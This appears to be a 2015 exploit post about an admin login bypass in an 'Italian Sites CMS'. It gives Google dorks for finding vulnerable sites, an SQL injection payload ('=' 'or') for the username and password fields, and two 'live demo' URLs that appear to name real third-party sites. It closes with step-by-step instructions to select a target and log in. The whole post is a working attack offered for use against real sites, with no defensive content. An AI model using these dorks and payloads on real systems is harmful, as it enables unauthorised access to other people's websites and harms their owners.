facebook facebook twitter rss

Italian Sites CMS Admin Bypass Vulnerability

Author: Persian-Cyber.Org , Published: 23-06-2015
##############################################################



# Exploit Title: Italian Sites CMS Admin Bypass Vulnerability



#



# Exploit Author: TerrOrisT InfamouS



#



# Discovered By: TerrOrisT InfamouS



#



# Dork 1 : inurl:/ADMIN/login.htm intext:<% if session("uid")="" then response.redirect("login.htm") %>
# Dork 2 : inurl:/ADMIN/login.htm intext:<% if session

#



# Date: 6/23/2015



#



# Tested on: Kali, Win - FireFox, Chrome, Opera



#



# Vendor's: Unknow



##############################################################



[~] VULNERABILITY}~~



##############



http://www.Site.com/ADMIN/login.htm







[~] EXPLOIT:



##############



Username: '=' 'or'



Password: '=' 'or'





[~] LIVE DEMO:



##############



Demo 1: http://www.teamgymworld.com/ADMIN/login.htm







Demo 2: http://www.mobilizanotti.com/admin/login.htm



#############################################################

[~] EXPLAIN:


Search Dork IN The Google And Select Your Target


Exploit To " site.com /ADMIN/login.htm "


Enter Username And Pasword :


Username: '=' 'or'


Password: '=' 'or'


GOOD LUCK



##############################################################



Contact Mail: hacker.terrorist@yahoo.com

Friends : Persian Mafia, WikE, Explo!T3r, N1F3r, JE4OR

Offecial Website: https://persian-cyber/forum/



##############################################################

Like us on Facebook :